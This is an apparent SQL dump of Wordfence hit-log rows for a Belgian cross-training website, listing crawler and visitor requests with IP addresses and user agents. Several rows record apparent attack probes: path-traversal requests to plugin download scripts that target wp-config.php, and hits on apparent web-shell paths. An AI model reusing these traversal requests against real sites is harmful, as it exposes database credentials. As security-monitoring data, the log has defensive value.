(71772, 1494246958.304231, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71773, 1494247092.519522, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(71774, 1494247349.546496, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/pomo/7313581d9a.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71775, 1494248102.023743, 2953337008, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/image-import.php', 'http://www.crosstrainingcenter.be/wp-admin/includes/image-import.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(71776, 1494249277.872435, 1554035825, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71777, 1494249279.423356, 1554035825, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71778, 1494254084.748082, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71779, 1494254085.953029, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71780, 1494254085.989546, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(71781, 1494254086.431973, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(71782, 1494254088.464739, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71783, 1494254101.591540, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71784, 1494255766.833798, 3024883462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71785, 1494259764.309703, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71786, 1494265890.794436, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/logo_img.php', 'http://www.crosstrainingcenter.be/wp-content/logo_img.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71787, 1494266589.203991, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71788, 1494266589.846194, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71789, 1494266590.300409, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71790, 1494266590.709064, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71791, 1494266591.122221, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71792, 1494266591.553350, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71793, 1494266592.059685, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71794, 1494266592.493980, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71795, 1494266592.905362, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71796, 1494266593.316831, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71797, 1494266593.731377, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71798, 1494266915.277310, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71799, 1494266915.745109, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71800, 1494266916.267487, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71801, 1494266916.846895, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71802, 1494266917.364847, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71803, 1494266917.844576, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71804, 1494266918.513454, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71805, 1494266919.023773, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71806, 1494266919.542751, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71807, 1494266919.978685, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71808, 1494266920.497462, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71809, 1494267229.176996, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71810, 1494268127.841819, 1834596154, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71811, 1494268129.028690, 1834596154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71812, 1494268528.906013, 1834596154, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71813, 1494268546.558728, 1834596154, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71814, 1494268550.960474, 1834596154, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71815, 1494270755.026661, 1837484288, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71816, 1494272326.681037, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71817, 1494272327.270073, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71818, 1494272327.703217, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71819, 1494272328.139139, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71820, 1494272328.600458, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71821, 1494272329.086642, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71822, 1494272329.607142, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71823, 1494272330.036402, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71824, 1494272330.540028, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71825, 1494272330.963252, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71826, 1494272331.453124, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71827, 1494275150.206037, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71828, 1494278744.809661, 2509961370, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71829, 1494278754.125085, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71830, 1494278773.016580, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71831, 1494278778.620138, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71832, 1494278809.290686, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71833, 1494278955.969198, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71834, 1494278964.489046, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71835, 1494283069.568827, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71836, 1494283070.038105, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71837, 1494283386.759816, 676177671, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71838, 1494285198.511690, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71839, 1494288886.226405, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71840, 1494289614.878640, 1311661259, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71841, 1494294428.733103, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71842, 1494299554.853202, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-vertical-gallery/readme.txt', 'http://crosstrainingcenter.be/wp-content/plugins/wp-vertical-gallery/readme.txt', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71843, 1494299909.050327, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71844, 1494302313.934127, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71845, 1494303663.123005, 1837931087, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://lm.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATOMjFE5MznW84lTKIcod8v12FuxxOSmKFUcS9DjpQmihlxuRrU9ABOV78tNt59H0g8ATh75ObJ69xBmBYbPun-fNQIsofkChyeT84zlgiCd__yH7axRSbBGdmZ7s9kbX4aH3gCA', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71846, 1494303665.175994, 1837931087, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71847, 1494303683.150096, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71848, 1494303687.414952, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71849, 1494303724.394978, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71850, 1494303728.417382, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71851, 1494303802.842346, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71852, 1494304001.679519, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71853, 1494305234.709946, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71854, 1494306424.870542, 2916143010, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71855, 1494306427.829861, 2916143010, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71856, 1494309149.786821, 1837924479, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71857, 1494309150.352525, 1837924479, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71858, 1494309150.829381, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71859, 1494309151.329802, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71860, 1494309151.815545, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71861, 1494309152.265224, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71862, 1494309152.811814, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71863, 1494309153.259518, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71864, 1494309153.701339, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71865, 1494309154.137824, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71866, 1494309154.574246, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71867, 1494310131.954654, 736163900, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(71868, 1494313874.316049, 3427775560, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)'),
(71869, 1494313994.105709, 3475901715, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71870, 1494318645.739710, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71871, 1494323207.771674, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71872, 1494323208.815012, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71873, 1494324401.853040, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71874, 1494326598.886505, 2637637383, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71875, 1494326599.235889, 2637637383, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71876, 1494326900.730853, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(71877, 1494326901.370062, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(71878, 1494327567.141032, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71879, 1494328330.924509, 3259896531, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71880, 1494328332.591559, 3259896531, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
